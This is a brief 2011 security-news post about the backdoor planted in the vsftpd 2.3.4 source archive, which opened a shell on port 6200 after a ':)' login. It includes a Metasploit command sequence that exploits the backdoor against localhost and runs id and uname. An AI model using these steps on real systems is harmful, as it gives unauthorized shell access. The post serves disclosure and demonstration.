Video Demonstration : Vsftpd backdoor discovered by Mathias Kresin

Mohit Kumar 05 Jul, 2011

Video Demonstration : Vsftpd backdoor discovered by Mathias Kresin

2.3.4 of vsftpd's downloadable source code was compromised and a backdoor added to the code. Evans, the author of vsftpd . This module exploits a malicious backdoor that was added to the VSFTPD download archive. This backdoor was present in the vsftpd-2.3.4.tar.gz archive sometime before July 3rd 2011.

The bad tarball included a backdoor in the code which would respond to a user logging in with a user name ":)" by listening on port 6200 for a connection and launching a shell when someone connects. Read more here

Affected versions :
vsftpd-2.3.4 from 2011-06-30

Metasploit demo :
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOST localhost
set PAYLOAD cmd/unix/interact
exploit
id
uname -a

Video Demonstration :

➤ Read Latest Stories

API Security Testing for Dummies [Free eBook]

Check Out These Free Cybersecurity Resources

Securely Integrate Open Source Into Your Software Supply Chain

Earn a Master's in Cybersecurity Risk Management

Exclusive Cybersecurity Deals

🔥 Learn Professional Hacking

10 courses + 1,236 lessons on latest techniques, forensics, malware analysis, network security and programming.

➤ Access Online Training Courses

🔥 Cybersecurity Certification Training

Get 1-year access to 108 hours of instruction on globally-recognized CISA, CISM, CISSP, PMI-RMP, and COBIT 5 certifications.

➤ Access Online Training Courses

📰 News Stories from 05 Jul, 2011